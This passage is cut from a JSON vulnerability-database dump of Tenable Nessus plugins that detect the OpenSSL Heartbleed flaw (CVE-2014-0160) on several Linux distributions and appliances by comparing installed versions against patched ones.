reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-12T10:12:41", "description": "pull in upstream patch for CVE-2014-0160", "edition": 11, "published": "2014-04-09T00:00:00", "title": "Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:openssl"], "id": "FEDORA_2014-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/73430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4910.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4910\");\n\n script_name(english:\"Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"pull in upstream patch for CVE-2014-0160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cfcceed5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n 
);\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"openssl-1.0.1e-37.fc19.1\")) 
flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:19:45", "description": "According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-04-18T00:00:00", "title": "Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:juniper:ive_os", "cpe:/a:juniper:junos_pulse_access_control_service", "cpe:/a:juniper:junos_pulse_secure_access_service"], "id": "JUNOS_PULSE_JSA10623.NASL", "href": "https://www.tenable.com/plugins/nessus/73688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73688);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information 
Disclosure (JSA10623) (Heartbleed)\");\n script_summary(english:\"Checks IVE/UAC OS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Juniper Junos IVE OS version 7.4R9.3 / 8.0R3.2 or later or\nUAC OS version 4.4R10 / 5.0R3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:ive_os\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_secure_access_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_access_control_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Juniper/IVE OS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('Host/Juniper/IVE OS/Version');\nmatch = eregmatch(string:version, pattern:\"^([\\d.]+)[Rr]([0-9.]+)\");\nif (isnull(match)) exit(1, 'Error parsing version: ' + version);\n\nrelease = match[1];\nbuild = match[2];\n\n# IVE OS\n# 7.4R1 to 7.4R9\nif (release == '7.4' && ver_compare(ver:build, fix:'9.3', strict:FALSE) == -1)\n fix = '7.4r9.3';\n# 8.0R1 to 8.0R3\nelse if (release == '8.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '8.0r3.2';\n\n# UAC OS\n# 4.4R1 to 4.4R9\nelse if (release == '4.4' && ver_compare(ver:build, fix:'10', strict:FALSE) == -1)\n fix = '4.4r10';\n# 5.0R1 to 5.0R3\nelse if (release == '5.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '5.0r3.2';\n\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'IVE/UAC OS', version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:18:46", "description": "A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. 
This flaw could be used to reveal up to\n64k of memory from a connected client or server.", "edition": 22, "published": "2014-04-09T00:00:00", "title": "Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssl-devel", "p-cpe:/a:amazon:linux:openssl", "p-cpe:/a:amazon:linux:openssl-debuginfo", "p-cpe:/a:amazon:linux:openssl-perl", "p-cpe:/a:amazon:linux:openssl-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-320.NASL", "href": "https://www.tenable.com/plugins/nessus/73438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-320.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73438);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/09/01 13:42:18 $\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"ALAS\", value:\"2014-320\");\n\n script_name(english:\"Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. 
This flaw could be used to reveal up to\n64k of memory from a connected client or server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://heartbleed.com/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20140407.txt\"\n );\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c70c979\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update openssl' to update your system and restart all\nservices that are using openssl. While the new package is still\nnamed openssl-1.0.1e, it does contain the fix for CVE-2014-0160.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2014/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.1e-37.66.amzn1\")) flag++;\n\nif (flag)\n{\n report = rpm_report_get();\n if (!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1.\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T02:34:51", "description": "The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information 
disclosure,\ncommonly known as the 'Heartbleed' bug. A remote, unauthenticated,\nattacker could potentially exploit this vulnerability to extract up to\n64 kilobytes of memory per request from the device.", "edition": 26, "published": "2014-04-11T00:00:00", "title": "Fortinet OpenSSL Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:fortinet:fortios"], "id": "FORTINET_FG-IR-14-011.NASL", "href": "https://www.tenable.com/plugins/nessus/73669", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73669);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Fortinet OpenSSL Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks version of Fortinet device.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The firmware of the remote Fortinet host is running a version of\nOpenSSL that is affected by a remote information disclosure,\ncommonly known as the 'Heartbleed' bug. 
A remote, unauthenticated,\nattacker could potentially exploit this vulnerability to extract up to\n64 kilobytes of memory per request from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-14-011\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a firmware version containing a fix for this\nvulnerability as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"fortinet_version.nbin\");\n script_require_keys(\"Host/Fortigate/model\", \"Host/Fortigate/version\", \"Host/Fortigate/build\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nmodel = get_kb_item_or_exit(\"Host/Fortigate/model\");\nversion = get_kb_item_or_exit(\"Host/Fortigate/version\");\nbuild = get_kb_item_or_exit(\"Host/Fortigate/build\");\n\n# FortiOS check.\nif (preg(string:model, pattern:\"forti(gate|wifi)\", icase:TRUE))\n{\n # Only 5.x is affected.\n if (version =~ \"^5\\.\") fix = \"5.0.7\";\n}\n# FortiMail Check\nelse if (preg(string:model, pattern:\"fortimail\", icase:TRUE))\n{\n # Only 4.3.x and 5.x are affected.\n if (version =~ \"^4\\.3\\.\") fix = \"4.3.7\";\n else if (version =~ \"^5\\.0\\.\") fix = \"5.0.5\";\n else if (version =~ \"^5\\.1\\.\") fix = \"5.1.2\";\n}\n# FortiRecorder Check, all affected.\nelse if (preg(string:model, pattern:\"fortirecorder\", icase:TRUE))\n{\n fix = \"1.4.1\";\n}\n# FortiVoice check, specific models affected.\nelse if (preg(string:model, pattern:\"fortivoice-(200d|vm)\", icase:TRUE))\n{\n fix = \"3.0.1\";\n}\n# FortiADC, specific models and versions affected.\nelse if (preg(string:model, pattern:\"fortiadc\", icase:TRUE))\n{\n if (model =~ \"E$\" && version =~ \"^3\\.\") fix = \"3.2.3\";\n else if (model =~ \"-(15|20|40)00D$\") fix = \"3.2.2\";\n}\n# FortiDDOS B-Series affected.\nelse if (preg(string:model, pattern:\"fortiddos-\\d+B\", icase:TRUE))\n{\n fix = \"4.0.1\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Model : ' + model +\n '\\n Version : ' + version +\n '\\n Fixed Version: ' + fix +\n '\\n';\n\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, model, version);\n", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:42", "description": "The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 28, "published": "2014-08-06T00:00:00", "title": "HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:version_control_repository_manager"], "id": "HP_VCRM_SSRT101531.NASL", "href": "https://www.tenable.com/plugins/nessus/77025", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77025);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n\n script_name(english:\"HP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of the VCA package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The HP Version Control Repository Manager (VCRM) install\non the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or\n7.3.1. It is, therefore, affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ea63ebcc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCRM 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_repository_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_version_control_repo_manager_installed.nbin\");\n script_require_keys(\"installed_sw/HP Version Control Repository Manager\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"HP Version Control Repository Manager\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\n# Only 1 install is possible at a time\ninstalls = get_installs(app_name:appname);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST, appname);\ninstall = installs[1][0];\n\nversion = install['version'];\npath = install['path'];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,appname);\n\n# These exact versions are vulnerable\nif (\n version =~ \"^7\\.2\\.[0-2]\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.3.2' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-05T11:12:16", "description": "This openssl update fixes one security issue :\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": 
"2014-06-13T00:00:00", "title": "openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:openssl-debugsource", "p-cpe:/a:novell:opensuse:libopenssl-devel", "p-cpe:/a:novell:opensuse:openssl-debuginfo", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo", "p-cpe:/a:novell:opensuse:libopenssl-devel-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-277.NASL", "href": "https://www.tenable.com/plugins/nessus/75314", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-277.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75314);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n\n script_name(english:\"openSUSE Security Update : openssl 